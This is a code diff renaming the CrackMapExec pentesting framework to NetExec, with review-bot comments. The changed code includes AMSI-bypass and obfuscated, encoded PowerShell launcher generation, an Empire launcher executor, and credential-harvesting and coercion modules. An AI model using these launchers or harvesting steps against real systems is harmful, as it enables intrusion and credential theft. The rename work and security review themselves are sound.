cme_logger.debug(invoke_obfs_command) nxc_logger.debug(invoke_obfs_command)
with open(os.devnull, "w") as devnull: with open(os.devnull, "w") as devnull:
return_code = call(invoke_obfs_command, stdout=devnull, stderr=devnull, shell=True) return_code = call(invoke_obfs_command, stdout=devnull, stderr=devnull, shell=True)
cme_logger.success("Script obfuscated successfully") nxc_logger.success("Script obfuscated successfully")
with open(obfs_ps_script, "r") as script: with open(obfs_ps_script, "r") as script:
return script.read() return script.read()
@ -108,7 +108,7 @@ else
else: else:
command = amsi_bypass + ps_command command = amsi_bypass + ps_command
cme_logger.debug("Generated PS command:\n {}\n".format(command)) nxc_logger.debug("Generated PS command:\n {}\n".format(command))
# We could obfuscate the initial launcher using Invoke-Obfuscation but because this function gets executed # We could obfuscate the initial launcher using Invoke-Obfuscation but because this function gets executed
# concurrently it would spawn a local powershell process per host which isn't ideal, until I figure out a good way # concurrently it would spawn a local powershell process per host which isn't ideal, until I figure out a good way
@ -118,7 +118,7 @@ else
""" """
if is_powershell_installed(): if is_powershell_installed():
temp = tempfile.NamedTemporaryFile(prefix='cme_', temp = tempfile.NamedTemporaryFile(prefix='nxc_',
suffix='.ps1', suffix='.ps1',
dir='/tmp') dir='/tmp')
temp.write(command) temp.write(command)
@ -130,11 +130,11 @@ else
invoke_obfs_command = 'powershell -C \'Import-Module {};Invoke-Obfuscation -ScriptPath {} -Command "ENCODING,{}" -Quiet\''.format(get_ps_script('invoke-obfuscation/Invoke-Obfuscation.psd1'), invoke_obfs_command = 'powershell -C \'Import-Module {};Invoke-Obfuscation -ScriptPath {} -Command "ENCODING,{}" -Quiet\''.format(get_ps_script('invoke-obfuscation/Invoke-Obfuscation.psd1'),
temp.name, temp.name,
encoding) encoding)
cme_logger.debug(invoke_obfs_command) nxc_logger.debug(invoke_obfs_command)
out = check_output(invoke_obfs_command, shell=True).split('\n')[4].strip() out = check_output(invoke_obfs_command, shell=True).split('\n')[4].strip()
command = 'powershell.exe -exec bypass -noni -nop -w 1 -C "{}"'.format(out) command = 'powershell.exe -exec bypass -noni -nop -w 1 -C "{}"'.format(out)
cme_logger.debug('Command length: {}'.format(len(command))) nxc_logger.debug('Command length: {}'.format(len(command)))
if len(command) <= 8192: if len(command) <= 8192:
temp.close() temp.close()
@ -152,14 +152,14 @@ else
break break
if obfs_attempts == 4: if obfs_attempts == 4:
cme_logger.error(f"Command exceeds maximum length of 8191 chars (was {len(command)}). exiting.") nxc_logger.error(f"Command exceeds maximum length of 8191 chars (was {len(command)}). exiting.")
exit(1) exit(1)
obfs_attempts += 1 obfs_attempts += 1
else: else:
command = f"powershell.exe -noni -nop -w 1 -enc {encode_ps_command(command)}" command = f"powershell.exe -noni -nop -w 1 -enc {encode_ps_command(command)}"
if len(command) > 8191: if len(command) > 8191:
cme_logger.error(f"Command exceeds maximum length of 8191 chars (was {len(command)}). exiting.") nxc_logger.error(f"Command exceeds maximum length of 8191 chars (was {len(command)}). exiting.")
exit(1) exit(1)
return command return command
@ -253,7 +253,7 @@ $request.GetResponse()""".format(
command=command, command=command,
) )
cme_logger.debug(f"Generated PS IEX Launcher:\n {launcher}\n") nxc_logger.debug(f"Generated PS IEX Launcher:\n {launcher}\n")
return launcher.strip() return launcher.strip()


@ -1,7 +1,7 @@
#!/usr/bin/env python3 #!/usr/bin/env python3
# -*- coding: utf-8 -*- # -*- coding: utf-8 -*-
import cme import nxc
import importlib import importlib
import traceback import traceback
import sys import sys
@ -10,9 +10,9 @@ from os import listdir
from os.path import dirname from os.path import dirname
from os.path import join as path_join from os.path import join as path_join
from cme.context import Context from nxc.context import Context
from cme.logger import CMEAdapter from nxc.logger import NXCAdapter
from cme.paths import CME_PATH from nxc.paths import nxc_PATH
class ModuleLoader: class ModuleLoader:
@ -60,8 +60,8 @@ class ModuleLoader:
Load a module, initializing it and checking that it has the proper attributes Load a module, initializing it and checking that it has the proper attributes
""" """
try: try:
spec = importlib.util.spec_from_file_location("CMEModule", module_path) spec = importlib.util.spec_from_file_location("nxcModule", module_path)
module = spec.loader.load_module().CMEModule() module = spec.loader.load_module().nxcModule()
if self.module_is_sane(module, module_path): if self.module_is_sane(module, module_path):
return module return module
@ -82,9 +82,9 @@ class ModuleLoader:
self.logger.debug(f"Protocol: {self.args.protocol}") self.logger.debug(f"Protocol: {self.args.protocol}")
if self.args.protocol in module.supported_protocols: if self.args.protocol in module.supported_protocols:
try: try:
module_logger = CMEAdapter(extra={"module_name": module.name.upper()}) module_logger = NXCAdapter(extra={"module_name": module.name.upper()})
except Exception as e: except Exception as e:
self.logger.fail(f"Error loading CMEAdaptor for module {module.name.upper()}: {e}") self.logger.fail(f"Error loading nxcAdaptor for module {module.name.upper()}: {e}")
context = Context(self.db, module_logger, self.args) context = Context(self.db, module_logger, self.args)
module_options = {} module_options = {}
@ -103,8 +103,8 @@ class ModuleLoader:
Get the path, description, and options from a module Get the path, description, and options from a module
""" """
try: try:
spec = importlib.util.spec_from_file_location("CMEModule", module_path) spec = importlib.util.spec_from_file_location("nxcModule", module_path)
module_spec = spec.loader.load_module().CMEModule module_spec = spec.loader.load_module().nxcModule
module = { module = {
f"{module_spec.name.lower()}": { f"{module_spec.name.lower()}": {
@ -129,8 +129,8 @@ class ModuleLoader:
""" """
modules = {} modules = {}
modules_paths = [ modules_paths = [
path_join(dirname(cme.__file__), "modules"), path_join(dirname(nxc.__file__), "modules"),
path_join(CME_PATH, "modules"), path_join(nxc_PATH, "modules"),
] ]
for path in modules_paths: for path in modules_paths:
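Review bot: The renamed identifiers in this loader mix casing: `nxc_PATH` for a module-level constant and `nxcModule` for a class, while the same commit names the logger class `NXCAdapter`; `NXC_PATH` and `NXCModule` would follow the usual constant and class conventions and match the adapter. Because `load_module` and `get_module_info` now look up `.nxcModule` on whatever file they import, a module left in the user modules directory that still defines `CMEModule` will raise AttributeError at that line; the `except` branches are outside these hunks, so how that is reported is not visible here. The fail message `Error loading nxcAdaptor for module` also spells the class differently from `NXCAdapter`.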


@ -5,12 +5,12 @@ from importlib.machinery import SourceFileLoader
from os import listdir from os import listdir
from os.path import join as path_join from os.path import join as path_join
from os.path import dirname, exists, expanduser from os.path import dirname, exists, expanduser
import cme import nxc
class ProtocolLoader: class ProtocolLoader:
def __init__(self): def __init__(self):
self.cme_path = expanduser("~/.cme") self.nxc_path = expanduser("~/.nxc")
def load_protocol(self, protocol_path): def load_protocol(self, protocol_path):
loader = SourceFileLoader("protocol", protocol_path) loader = SourceFileLoader("protocol", protocol_path)
@ -21,8 +21,8 @@ class ProtocolLoader:
def get_protocols(self): def get_protocols(self):
protocols = {} protocols = {}
protocol_paths = [ protocol_paths = [
path_join(dirname(cme.__file__), "protocols"), path_join(dirname(nxc.__file__), "protocols"),
path_join(self.cme_path, "protocols"), path_join(self.nxc_path, "protocols"),
] ]
for path in protocol_paths: for path in protocol_paths:


@ -6,28 +6,28 @@ from logging.handlers import RotatingFileHandler
import os.path import os.path
import sys import sys
import re import re
from cme.helpers.misc import called_from_cmd_args from nxc.helpers.misc import called_from_cmd_args
from cme.console import cme_console from nxc.console import nxc_console
from termcolor import colored from termcolor import colored
from datetime import datetime from datetime import datetime
from rich.text import Text from rich.text import Text
from rich.logging import RichHandler from rich.logging import RichHandler
class CMEAdapter(logging.LoggerAdapter): class NXCAdapter(logging.LoggerAdapter):
def __init__(self, extra=None): def __init__(self, extra=None):
logging.basicConfig( logging.basicConfig(
format="%(message)s", format="%(message)s",
datefmt="[%X]", datefmt="[%X]",
handlers=[ handlers=[
RichHandler( RichHandler(
console=cme_console, console=nxc_console,
rich_tracebacks=True, rich_tracebacks=True,
tracebacks_show_locals=False, tracebacks_show_locals=False,
) )
], ],
) )
self.logger = logging.getLogger("cme") self.logger = logging.getLogger("nxc")
self.extra = extra self.extra = extra
self.output_file = None self.output_file = None
@ -55,7 +55,7 @@ class CMEAdapter(logging.LoggerAdapter):
kwargs, kwargs,
) )
# If the logger is being called from CMEServer # If the logger is being called from nxcServer
if len(self.extra) == 2 and ("module_name" in self.extra.keys()) and ("host" in self.extra.keys()): if len(self.extra) == 2 and ("module_name" in self.extra.keys()) and ("host" in self.extra.keys()):
return ( return (
f"{colored(self.extra['module_name'], 'cyan', attrs=['bold']):<24} {self.extra['host']:<39} {msg}", f"{colored(self.extra['module_name'], 'cyan', attrs=['bold']):<24} {self.extra['host']:<39} {msg}",
@ -75,7 +75,7 @@ class CMEAdapter(logging.LoggerAdapter):
def display(self, msg, *args, **kwargs): def display(self, msg, *args, **kwargs):
""" """
Display text to console, formatted for CME Display text to console, formatted for nxc
""" """
try: try:
if "protocol" in self.extra.keys() and not called_from_cmd_args(): if "protocol" in self.extra.keys() and not called_from_cmd_args():
@ -85,7 +85,7 @@ class CMEAdapter(logging.LoggerAdapter):
msg, kwargs = self.format(f"{colored('[*]', 'blue', attrs=['bold'])} {msg}", kwargs) msg, kwargs = self.format(f"{colored('[*]', 'blue', attrs=['bold'])} {msg}", kwargs)
text = Text.from_ansi(msg) text = Text.from_ansi(msg)
cme_console.print(text, *args, **kwargs) nxc_console.print(text, *args, **kwargs)
self.log_console_to_file(text, *args, **kwargs) self.log_console_to_file(text, *args, **kwargs)
def success(self, msg, color='green', *args, **kwargs): def success(self, msg, color='green', *args, **kwargs):
@ -100,7 +100,7 @@ class CMEAdapter(logging.LoggerAdapter):
msg, kwargs = self.format(f"{colored('[+]', color, attrs=['bold'])} {msg}", kwargs) msg, kwargs = self.format(f"{colored('[+]', color, attrs=['bold'])} {msg}", kwargs)
text = Text.from_ansi(msg) text = Text.from_ansi(msg)
cme_console.print(text, *args, **kwargs) nxc_console.print(text, *args, **kwargs)
self.log_console_to_file(text, *args, **kwargs) self.log_console_to_file(text, *args, **kwargs)
def highlight(self, msg, *args, **kwargs): def highlight(self, msg, *args, **kwargs):
@ -115,7 +115,7 @@ class CMEAdapter(logging.LoggerAdapter):
msg, kwargs = self.format(f"{colored(msg, 'yellow', attrs=['bold'])}", kwargs) msg, kwargs = self.format(f"{colored(msg, 'yellow', attrs=['bold'])}", kwargs)
text = Text.from_ansi(msg) text = Text.from_ansi(msg)
cme_console.print(text, *args, **kwargs) nxc_console.print(text, *args, **kwargs)
self.log_console_to_file(text, *args, **kwargs) self.log_console_to_file(text, *args, **kwargs)
def fail(self, msg, color='red', *args, **kwargs): def fail(self, msg, color='red', *args, **kwargs):
@ -129,7 +129,7 @@ class CMEAdapter(logging.LoggerAdapter):
pass pass
msg, kwargs = self.format(f"{colored('[-]', color, attrs=['bold'])} {msg}", kwargs) msg, kwargs = self.format(f"{colored('[-]', color, attrs=['bold'])} {msg}", kwargs)
text = Text.from_ansi(msg) text = Text.from_ansi(msg)
cme_console.print(text, *args, **kwargs) nxc_console.print(text, *args, **kwargs)
self.log_console_to_file(text, *args, **kwargs) self.log_console_to_file(text, *args, **kwargs)
def log_console_to_file(self, text, *args, **kwargs): def log_console_to_file(self, text, *args, **kwargs):
@ -144,7 +144,7 @@ class CMEAdapter(logging.LoggerAdapter):
for handler in self.logger.handlers: for handler in self.logger.handlers:
handler.handle( handler.handle(
LogRecord( LogRecord(
"cme", "nxc",
20, 20,
"", "",
kwargs, kwargs,
@ -181,11 +181,11 @@ class CMEAdapter(logging.LoggerAdapter):
@staticmethod @staticmethod
def init_log_file(): def init_log_file():
newpath = os.path.expanduser("~/.cme") + "/logs/" + datetime.now().strftime('%Y-%m-%d') newpath = os.path.expanduser("~/.nxc") + "/logs/" + datetime.now().strftime('%Y-%m-%d')
if not os.path.exists(newpath): if not os.path.exists(newpath):
os.makedirs(newpath) os.makedirs(newpath)
log_filename = os.path.join( log_filename = os.path.join(
os.path.expanduser("~/.cme"), os.path.expanduser("~/.nxc"),
"logs", "logs",
datetime.now().strftime('%Y-%m-%d'), datetime.now().strftime('%Y-%m-%d'),
f"log_{datetime.now().strftime('%Y-%m-%d-%H-%M-%S')}.log", f"log_{datetime.now().strftime('%Y-%m-%d-%H-%M-%S')}.log",
@ -205,5 +205,5 @@ class TermEscapeCodeFormatter(logging.Formatter):
return super().format(record) return super().format(record)
# initialize the logger for all of CME - this is imported everywhere # initialize the logger for all of nxc - this is imported everywhere
cme_logger = CMEAdapter() nxc_logger = NXCAdapter()
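Review bot: `init_log_file` creates the new `~/.nxc/logs/<date>` directory with `os.makedirs(newpath)` after a separate `os.path.exists` test, so the directory gets whatever permissions the process umask allows and the check-then-create pair can race between two concurrent runs. `log_console_to_file` sends console output to the file handlers, and modules on this page print account passwords through `highlight`, so the directory is worth restricting: `os.makedirs(newpath, mode=0o700, exist_ok=True)` replaces both lines. The rest of `init_log_file` lies outside the hunk, so how the log file itself is opened is not visible.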


@ -11,7 +11,7 @@ from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_NONE
from impacket.dcerpc.v5.dcomrt import IObjectExporter from impacket.dcerpc.v5.dcomrt import IObjectExporter
class CMEModule: class nxcModule:
name = "ioxidresolver" name = "ioxidresolver"
description = "This module helps you to identify hosts that have additional active interfaces" description = "This module helps you to identify hosts that have additional active interfaces"
supported_protocols = ["smb", "wmi"] supported_protocols = ["smb", "wmi"]


@ -2,12 +2,12 @@
# -*- coding: utf-8 -*- # -*- coding: utf-8 -*-
class CMEModule: class nxcModule:
""" """
Module by Shutdown and Podalirius Module by Shutdown and Podalirius
Initial module: Initial module:
https://github.com/ShutdownRepo/CrackMapExec-MachineAccountQuota https://github.com/ShutdownRepo/NetExec-MachineAccountQuota
Authors: Authors:
Shutdown: @_nwodtuhs Shutdown: @_nwodtuhs
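Review bot: The search-and-replace also rewrote the attribution link in this docstring, from `https://github.com/ShutdownRepo/CrackMapExec-MachineAccountQuota` to `https://github.com/ShutdownRepo/NetExec-MachineAccountQuota`. That is a third-party repository this project does not control and which presumably kept its original name, so the credit now points at a location that may not exist; the original URL should be restored. The same rewrite appears in the `Cyb3rC3lt/...-Modules` links of the add-computer, find-computer and group-mem modules, and in the groupmembership module's `juliourena/.../get_description.py` link and its "HackTheBox Academy team for" credit line.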


@ -5,7 +5,7 @@ from impacket.ldap import ldap, ldapasn1
from impacket.ldap.ldap import LDAPSearchError from impacket.ldap.ldap import LDAPSearchError
class CMEModule: class nxcModule:
""" """
Find PKI Enrollment Services in Active Directory and Certificate Templates Names. Find PKI Enrollment Services in Active Directory and Certificate Templates Names.


@ -5,11 +5,11 @@
import ldap3 import ldap3
from impacket.dcerpc.v5 import samr, epm, transport from impacket.dcerpc.v5 import samr, epm, transport
class CMEModule: class nxcModule:
''' '''
Module by CyberCelt: @Cyb3rC3lt Module by CyberCelt: @Cyb3rC3lt
Initial module: Initial module:
https://github.com/Cyb3rC3lt/CrackMapExec-Modules https://github.com/Cyb3rC3lt/NetExec-Modules
Thanks to the guys at impacket for the original code Thanks to the guys at impacket for the original code
''' '''
@ -26,9 +26,9 @@ class CMEModule:
PASSWORD: Specify the PASSWORD option to supply a password for the Computer to be added PASSWORD: Specify the PASSWORD option to supply a password for the Computer to be added
DELETE: Specify DELETE to remove a Computer DELETE: Specify DELETE to remove a Computer
CHANGEPW: Specify CHANGEPW to modify a Computer password CHANGEPW: Specify CHANGEPW to modify a Computer password
Usage: cme smb $DC-IP -u Username -p Password -M add-computer -o NAME="BADPC" PASSWORD="Password1" Usage: nxc smb $DC-IP -u Username -p Password -M add-computer -o NAME="BADPC" PASSWORD="Password1"
cme smb $DC-IP -u Username -p Password -M add-computer -o NAME="BADPC" DELETE=True nxc smb $DC-IP -u Username -p Password -M add-computer -o NAME="BADPC" DELETE=True
cme smb $DC-IP -u Username -p Password -M add-computer -o NAME="BADPC" PASSWORD="Password2" CHANGEPW=True nxc smb $DC-IP -u Username -p Password -M add-computer -o NAME="BADPC" PASSWORD="Password2" CHANGEPW=True
''' '''
self.__baseDN = None self.__baseDN = None
@ -296,9 +296,9 @@ class CMEModule:
['top', 'person', 'organizationalPerson', 'user', 'computer'], ucd) ['top', 'person', 'organizationalPerson', 'user', 'computer'], ucd)
if result: if result:
context.log.highlight('Successfully added the machine account: "' + self.__computerName + '" with Password: "' + self.__computerPassword + '"') context.log.highlight('Successfully added the machine account: "' + self.__computerName + '" with Password: "' + self.__computerPassword + '"')
context.log.highlight(u'{}'.format('You can try to verify this with the CME command:')) context.log.highlight(u'{}'.format('You can try to verify this with the nxc command:'))
context.log.highlight(u'{}'.format( context.log.highlight(u'{}'.format(
'cme ldap ' + connection.host + ' -u ' + connection.username + ' -p ' + connection.password + ' -M group-mem -o GROUP="Domain Computers"')) 'nxc ldap ' + connection.host + ' -u ' + connection.username + ' -p ' + connection.password + ' -M group-mem -o GROUP="Domain Computers"'))
elif result == False and c.last_error == "entryAlreadyExists": elif result == False and c.last_error == "entryAlreadyExists":
context.log.highlight(u'{}'.format('The Computer account "' + self.__computerName + '" already exists')) context.log.highlight(u'{}'.format('The Computer account "' + self.__computerName + '" already exists'))
elif not result: elif not result:
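Review bot: The success branch prints `connection.password` and `self.__computerPassword` in clear through `context.log.highlight`, both in the "Successfully added the machine account" line and inside the suggested `nxc ldap ... -p ...` verification command. In the logger shown on this page `highlight` also passes its text to `log_console_to_file`, so these values can end up in the files under `~/.nxc/logs` when file logging is enabled (not visible here). The hint works just as well with a placeholder, e.g. `' -u ' + connection.username + ' -p <password> -M group-mem -o GROUP="Domain Computers"'`. The enclosing method starts and ends outside the hunk.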


@ -1,6 +1,6 @@
#!/usr/bin/env python3 #!/usr/bin/env python3
# -*- coding: utf-8 -*- # -*- coding: utf-8 -*-
class CMEModule: class nxcModule:
""" """
Checks for credentials in IIS Application Pool configuration files using appcmd.exe. Checks for credentials in IIS Application Pool configuration files using appcmd.exe.


@ -11,7 +11,7 @@ from neo4j import GraphDatabase
from neo4j.exceptions import AuthError, ServiceUnavailable from neo4j.exceptions import AuthError, ServiceUnavailable
class CMEModule: class nxcModule:
name = "bh_owned" name = "bh_owned"
description = "Set pwned computer as owned in Bloodhound" description = "Set pwned computer as owned in Bloodhound"
supported_protocols = ["smb"] supported_protocols = ["smb"]


@ -6,7 +6,7 @@ import datetime
from enum import Enum from enum import Enum
from impacket.ldap import ldaptypes from impacket.ldap import ldaptypes
from impacket.uuid import bin_to_string from impacket.uuid import bin_to_string
from cme.helpers.msada_guids import SCHEMA_OBJECTS, EXTENDED_RIGHTS from nxc.helpers.msada_guids import SCHEMA_OBJECTS, EXTENDED_RIGHTS
from ldap3.protocol.formatters.formatters import format_sid from ldap3.protocol.formatters.formatters import format_sid
from ldap3.utils.conv import escape_filter_chars from ldap3.utils.conv import escape_filter_chars
from ldap3.protocol.microsoft import security_descriptor_control from ldap3.protocol.microsoft import security_descriptor_control
@ -187,7 +187,7 @@ class ALLOWED_OBJECT_ACE_MASK_FLAGS(Enum):
Self = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_SELF Self = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_SELF
class CMEModule: class nxcModule:
""" """
Module to read and backup the Discretionary Access Control List of one or multiple objects. Module to read and backup the Discretionary Access Control List of one or multiple objects.
This module is essentially inspired from the dacledit.py script of Impacket that we have coauthored, @_nwodtuhs and me. This module is essentially inspired from the dacledit.py script of Impacket that we have coauthored, @_nwodtuhs and me.


@ -7,10 +7,10 @@ from impacket.dcerpc.v5.ndr import NDRCALL
from impacket.dcerpc.v5.dtypes import ULONG, WSTR, DWORD from impacket.dcerpc.v5.dtypes import ULONG, WSTR, DWORD
from impacket.dcerpc.v5.rpcrt import DCERPCException from impacket.dcerpc.v5.rpcrt import DCERPCException
from impacket.uuid import uuidtup_to_bin from impacket.uuid import uuidtup_to_bin
from cme.logger import cme_logger from nxc.logger import nxc_logger
class CMEModule: class nxcModule:
name = "dfscoerce" name = "dfscoerce"
description = "Module to check if the DC is vulnerable to DFSCocerc, credit to @filip_dragovic/@Wh04m1001 and @topotam" description = "Module to check if the DC is vulnerable to DFSCocerc, credit to @filip_dragovic/@Wh04m1001 and @topotam"
supported_protocols = ["smb"] supported_protocols = ["smb"]
@ -123,31 +123,31 @@ class TriggerAuth:
rpctransport.setRemoteHost(target) rpctransport.setRemoteHost(target)
dce = rpctransport.get_dce_rpc() dce = rpctransport.get_dce_rpc()
cme_logger.debug("[-] Connecting to %s" % r"ncacn_np:%s[\PIPE\netdfs]" % target) nxc_logger.debug("[-] Connecting to %s" % r"ncacn_np:%s[\PIPE\netdfs]" % target)
try: try:
dce.connect() dce.connect()
except Exception as e: except Exception as e:
cme_logger.debug("Something went wrong, check error status => %s" % str(e)) nxc_logger.debug("Something went wrong, check error status => %s" % str(e))
return return
try: try:
dce.bind(uuidtup_to_bin(("4FC742E0-4A10-11CF-8273-00AA004AE673", "3.0"))) dce.bind(uuidtup_to_bin(("4FC742E0-4A10-11CF-8273-00AA004AE673", "3.0")))
except Exception as e: except Exception as e:
cme_logger.debug("Something went wrong, check error status => %s" % str(e)) nxc_logger.debug("Something went wrong, check error status => %s" % str(e))
return return
cme_logger.debug("[+] Successfully bound!") nxc_logger.debug("[+] Successfully bound!")
return dce return dce
def NetrDfsRemoveStdRoot(self, dce, listener): def NetrDfsRemoveStdRoot(self, dce, listener):
cme_logger.debug("[-] Sending NetrDfsRemoveStdRoot!") nxc_logger.debug("[-] Sending NetrDfsRemoveStdRoot!")
try: try:
request = NetrDfsRemoveStdRoot() request = NetrDfsRemoveStdRoot()
request["ServerName"] = "%s\x00" % listener request["ServerName"] = "%s\x00" % listener
request["RootShare"] = "test\x00" request["RootShare"] = "test\x00"
request["ApiFlags"] = 1 request["ApiFlags"] = 1
if self.args.verbose: if self.args.verbose:
cme_logger.debug(request.dump()) nxc_logger.debug(request.dump())
# logger.debug(request.dump()) # logger.debug(request.dump())
resp = dce.request(request) resp = dce.request(request)
except Exception as e: except Exception as e:
cme_logger.debug(e) nxc_logger.debug(e)


@ -4,7 +4,7 @@
import ntpath import ntpath
class CMEModule: class nxcModule:
""" """
Technique discovered by @DTMSecurity and @domchell to remotely coerce an host to start WebClient service. Technique discovered by @DTMSecurity and @domchell to remotely coerce an host to start WebClient service.
https://dtm.uk/exploring-search-connectors-and-library-files-on-windows/ https://dtm.uk/exploring-search-connectors-and-library-files-on-windows/


@ -11,7 +11,7 @@ from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning) requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
class CMEModule: class nxcModule:
""" """
Uses Empire's RESTful API to generate a launcher for the specified listener and executes it Uses Empire's RESTful API to generate a launcher for the specified listener and executes it
Module by @byt3bl33d3r Module by @byt3bl33d3r
@ -75,7 +75,7 @@ class CMEModule:
sys.exit(1) sys.exit(1)
data = { data = {
"name": "cme_ephemeral", "name": "nxc_ephemeral",
"template": "multi_launcher", "template": "multi_launcher",
"options": { "options": {
"Listener": module_options["LISTENER"], "Listener": module_options["LISTENER"],


@ -10,7 +10,7 @@ from impacket.dcerpc.v5 import transport
import pathlib import pathlib
class CMEModule: class nxcModule:
""" """
Uses LsarLookupNames and NamedPipes to gather information on all endpoint protection solutions installed on the the remote host(s) Uses LsarLookupNames and NamedPipes to gather information on all endpoint protection solutions installed on the the remote host(s)
Module by @mpgn_x64 Module by @mpgn_x64


@ -2,10 +2,10 @@
# -*- coding: utf-8 -*- # -*- coding: utf-8 -*-
from datetime import datetime from datetime import datetime
from cme.helpers.logger import write_log from nxc.helpers.logger import write_log
class CMEModule: class nxcModule:
""" """
Uses WMI to dump DNS from an AD DNS Server. Uses WMI to dump DNS from an AD DNS Server.
Module by @fang0654 Module by @fang0654
@ -72,4 +72,4 @@ class CMEModule:
log_name = "DNS-Enum-{}-{}.log".format(connection.host, datetime.now().strftime("%Y-%m-%d_%H%M%S")) log_name = "DNS-Enum-{}-{}.log".format(connection.host, datetime.now().strftime("%Y-%m-%d_%H%M%S"))
write_log(data, log_name) write_log(data, log_name)
context.log.display(f"Saved raw output to ~/.cme/logs/{log_name}") context.log.display(f"Saved raw output to ~/.nxc/logs/{log_name}")


@ -2,7 +2,7 @@
# -*- coding: utf-8 -*- # -*- coding: utf-8 -*-
class CMEModule: class nxcModule:
""" """
Example Example
Module by @yomama Module by @yomama


@ -3,12 +3,12 @@
import socket import socket
import sys import sys
class CMEModule: class nxcModule:
''' '''
Module by CyberCelt: @Cyb3rC3lt Module by CyberCelt: @Cyb3rC3lt
Initial module: Initial module:
https://github.com/Cyb3rC3lt/CrackMapExec-Modules https://github.com/Cyb3rC3lt/NetExec-Modules
''' '''
name = 'find-computer' name = 'find-computer'
@ -21,8 +21,8 @@ class CMEModule:
''' '''
find-computer: Specify find-computer to call the module find-computer: Specify find-computer to call the module
TEXT: Specify the TEXT option to enter your text to search for TEXT: Specify the TEXT option to enter your text to search for
Usage: cme ldap $DC-IP -u Username -p Password -M find-computer -o TEXT="server" Usage: nxc ldap $DC-IP -u Username -p Password -M find-computer -o TEXT="server"
cme ldap $DC-IP -u Username -p Password -M find-computer -o TEXT="SQL" nxc ldap $DC-IP -u Username -p Password -M find-computer -o TEXT="SQL"
''' '''
self.TEXT = '' self.TEXT = ''


@ -1,9 +1,9 @@
#!/usr/bin/env python3 #!/usr/bin/env python3
from dploot.lib.target import Target from dploot.lib.target import Target
from cme.protocols.smb.firefox import FirefoxTriage from nxc.protocols.smb.firefox import FirefoxTriage
class CMEModule: class nxcModule:
""" """
Firefox by @zblurx Firefox by @zblurx
Inspired by firefox looting from DonPAPI Inspired by firefox looting from DonPAPI


@ -4,10 +4,10 @@
from impacket.ldap import ldapasn1 as ldapasn1_impacket from impacket.ldap import ldapasn1 as ldapasn1_impacket
from impacket.ldap import ldap as ldap_impacket from impacket.ldap import ldap as ldap_impacket
import re import re
from cme.logger import cme_logger from nxc.logger import nxc_logger
class CMEModule: class nxcModule:
""" """
Get description of users Get description of users
Module by @nodauf Module by @nodauf
@ -56,7 +56,7 @@ class CMEModule:
resp = e.getAnswers() resp = e.getAnswers()
pass pass
else: else:
cme_logger.debug(e) nxc_logger.debug(e)
return False return False
answers = [] answers = []


@ -2,11 +2,11 @@
# -*- coding: utf-8 -*- # -*- coding: utf-8 -*-
from datetime import datetime from datetime import datetime
from cme.helpers.logger import write_log from nxc.helpers.logger import write_log
import json import json
class CMEModule: class nxcModule:
""" """
Uses WMI to extract network connections, used to find multi-homed hosts. Uses WMI to extract network connections, used to find multi-homed hosts.
Module by @fang0654 Module by @fang0654
@ -37,4 +37,4 @@ class CMEModule:
log_name = "network-connections-{}-{}.log".format(connection.host, datetime.now().strftime("%Y-%m-%d_%H%M%S")) log_name = "network-connections-{}-{}.log".format(connection.host, datetime.now().strftime("%Y-%m-%d_%H%M%S"))
write_log(json.dumps(data), log_name) write_log(json.dumps(data), log_name)
context.log.display(f"Saved raw output to ~/.cme/logs/{log_name}") context.log.display(f"Saved raw output to ~/.nxc/logs/{log_name}")


@ -5,7 +5,7 @@ import xml.etree.ElementTree as ET
from io import BytesIO from io import BytesIO
class CMEModule: class nxcModule:
""" """
Reference: https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPAutologon.ps1 Reference: https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPAutologon.ps1
Module by @byt3bl33d3r Module by @byt3bl33d3r


@ -8,7 +8,7 @@ from binascii import unhexlify
from io import BytesIO from io import BytesIO
class CMEModule: class nxcModule:
""" """
Reference: https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1 Reference: https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1
Module by @byt3bl33d3r Module by @byt3bl33d3r


@ -3,12 +3,12 @@
from impacket.ldap import ldapasn1 as ldapasn1_impacket from impacket.ldap import ldapasn1 as ldapasn1_impacket
class CMEModule: class nxcModule:
''' '''
Module by CyberCelt: @Cyb3rC3lt Module by CyberCelt: @Cyb3rC3lt
Initial module: Initial module:
https://github.com/Cyb3rC3lt/CrackMapExec-Modules https://github.com/Cyb3rC3lt/NetExec-Modules
''' '''
name = 'group-mem' name = 'group-mem'
@ -23,8 +23,8 @@ class CMEModule:
''' '''
group-mem: Specify group-mem to call the module group-mem: Specify group-mem to call the module
GROUP: Specify the GROUP option to query for that group's members GROUP: Specify the GROUP option to query for that group's members
Usage: cme ldap $DC-IP -u Username -p Password -M group-mem -o GROUP="domain admins" Usage: nxc ldap $DC-IP -u Username -p Password -M group-mem -o GROUP="domain admins"
cme ldap $DC-IP -u Username -p Password -M group-mem -o GROUP="domain controllers" nxc ldap $DC-IP -u Username -p Password -M group-mem -o GROUP="domain controllers"
''' '''
self.GROUP = '' self.GROUP = ''


@ -5,13 +5,13 @@ from impacket.ldap import ldapasn1 as ldapasn1_impacket
from impacket.ldap import ldap as ldap_impacket from impacket.ldap import ldap as ldap_impacket
class CMEModule: class nxcModule:
""" """
Created as a contributtion from HackTheBox Academy team for CrackMapExec Created as a contributtion from HackTheBox Academy team for NetExec
Reference: https://academy.hackthebox.com/module/details/84 Reference: https://academy.hackthebox.com/module/details/84
Module by @juliourena Module by @juliourena
Based on: https://github.com/juliourena/CrackMapExec/blob/master/cme/modules/get_description.py Based on: https://github.com/juliourena/NetExec/blob/master/nxc/modules/get_description.py
""" """
name = "groupmembership" name = "groupmembership"

File diff suppressed because one or more lines are too long


@ -32,7 +32,7 @@ def neo4j_conn(context, connection, driver):
context.log.fail("Error querying domain admins") context.log.fail("Error querying domain admins")
context.log.debug(e) context.log.debug(e)
else: else:
context.log.fail("BloodHound not marked enabled. Check cme.conf") context.log.fail("BloodHound not marked enabled. Check nxc.conf")
exit(1) exit(1)
@ -134,7 +134,7 @@ def initial_run(connection, cursor):
) )
class CMEModule: class nxcModule:
name = "hash_spider" name = "hash_spider"
